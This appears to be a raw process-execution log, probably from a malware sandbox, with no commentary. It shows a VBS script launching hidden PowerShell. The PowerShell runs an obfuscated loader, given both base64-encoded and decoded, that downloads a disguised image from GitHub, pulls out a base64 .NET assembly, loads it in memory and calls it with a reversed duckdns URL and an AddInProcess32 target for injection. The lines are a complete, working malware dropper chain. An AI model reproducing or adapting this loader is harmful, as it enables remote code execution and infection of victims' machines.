wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\eveningxlsxxxxMPDW-constraints.vbs
840powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aU5WT0tlLUVYUHJlc3NpT04oICgnbFFraW1hZ2VVcmwgPSA5TGhodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMvbWFpbi9EZXRhaE5vdGVfVi5qcGcgOUxoO2xRa3dlYkNsaWVudCA9IE5lJysndy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7bFEnKydraW1hZ2VCeXRlcyA9ICcrJ2xRa3dlYkNsaWVudC5Eb3dubG9hZERhdGEobFFraW1hZ2VVcmwpO2xRaycrJ2ltYWcnKydlVGV4dCA9IFtTeXN0ZW0uJysnVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGxRa2ltYWdlQnl0ZXMpO2xRa3N0YXJ0RmwnKydhZyA9IDlMaDw8QkFTRTY0X1NUQVJUPj45TGg7bFFrZW5kRmxhZyA9IDlMaDw8QkFTRTY0X0VORD4+OUxoO2xRa3N0YXJ0SScrJ25kZXggPSBsUWtpbWFnZVRleHQuSW5kZXhPZihsUWtzJysndGFydEZsYWcpO2xRa2VuZEluZGV4ID0gbFFraW1hZ2VUZXh0LkluZGV4T2YnKycobFFrZW5kRmxhZyk7bFFrc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW4nKydkICcrJ2xRa2VuZEluZGV4IC1ndCBsUWtzdGFydEluZGV4O2xRa3N0YXJ0SW5kZXggKz0gbFFrc3RhcnRGbGFnLkxlbmd0aDtsUWtiYXMnKydlNjRMZW5ndGgnKycgPSBsUWtlbmRJJysnbmRleCAtIGxRa3N0YXJ0SW5kZXg7bFFrYmFzZTY0Q29tJysnbWFuZCA9IGxRa2ltYWdlVGV4dC5TdWJzdHJpbmcobFEnKydrc3RhcnRJbmRleCwgbFFrYicrJ2FzZTY0TGVuZ3RoJysnKTtsUWtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKGxRJysna2Jhc2U2NENvbW1hbmQpO2xRa2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS4nKydSZWZsZWN0aW9uLkFzc2UnKydtYmx5XTo6TG9hZChsJysnUWtjb21tYW5kQnl0ZXMpO2xRa3ZhaU1ldGhvZCA9IFtkbmxpJysnYi5JTy5Ib21lXS5HZXRNZXRob2QoOUxoVkFJOUwnKydoKTtsUWt2YWlNZXRob2QuSW4nKyd2b2tlKGxRa251bGwsIEAoOUxodHh0LjQ0NDQ2ZXNhYmJiYmJiZXdtYWRhbS9ncm8uc25ka2N1ZC4nKyduYW1lZWVsa2FyaW0vLzpwdHQnKydoOUxoLCAnKyc5TGhkZXNhdGl2YWRvOUxoLCA5TGhkZXNhdGl2YWRvOUxoLCA5TGhkZXNhdGl2YWRvOUxoLCA5JysnTGhBZGRJblByb2Nlc3MzMjlMaCwgOUwnKydoZGVzYXRpdmFkbzlMaCwgOUxoZGVzYXRpdmFkbzlMaCkpOycpLlJFUGxhQ2UoJ2xRaycsW1NUckluZ11bY0hBUl0zNikuUkVQbGFDZSgoW2NIQVJdNTcrW2NIQVJdNzYrW2NIQVJdMTA0KSxbU1RySW5nXVtjSEFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2072powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "iNVOKe-EXPressiON( ('lQkimageUrl = 9Lhhttps://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg 9Lh;lQkwebClient = Ne'+'w-Object System.Net.WebClient;lQ'+'kimageBytes = '+'lQkwebClient.DownloadData(lQkimageUrl);lQk'+'imag'+'eText = [System.'+'Text.Encoding]::UTF8.GetString(lQkimageBytes);lQkstartFl'+'ag = 9Lh<<BASE64_START>>9Lh;lQkendFlag = 9Lh<<BASE64_END>>9Lh;lQkstartI'+'ndex = lQkimageText.IndexOf(lQks'+'tartFlag);lQkendIndex = lQkimageText.IndexOf'+'(lQkendFlag);lQkstartIn'+'dex -ge 0 -an'+'d '+'lQkendIndex -gt lQkstartIndex;lQkstartIndex += lQkstartFlag.Length;lQkbas'+'e64Length'+' = lQkendI'+'ndex - lQkstartIndex;lQkbase64Com'+'mand = lQkimageText.Substring(lQ'+'kstartIndex, lQkb'+'ase64Length'+');lQkcommandBytes = [System.Convert]::FromBase64String(lQ'+'kbase64Command);lQkloadedAssembly = [System.'+'Reflection.Asse'+'mbly]::Load(l'+'QkcommandBytes);lQkvaiMethod = [dnli'+'b.IO.Home].GetMethod(9LhVAI9L'+'h);lQkvaiMethod.In'+'voke(lQknull, @(9Lhtxt.44446esabbbbbbewmadam/gro.sndkcud.'+'nameeelkarim//:ptt'+'h9Lh, '+'9Lhdesativado9Lh, 9Lhdesativado9Lh, 9Lhdesativado9Lh, 9'+'LhAddInProcess329Lh, 9L'+'hdesativado9Lh, 9Lhdesativado9Lh));').REPlaCe('lQk',[STrIng][cHAR]36).REPlaCe(([cHAR]57+[cHAR]76+[cHAR]104),[STrIng][cHAR]39) )"
2200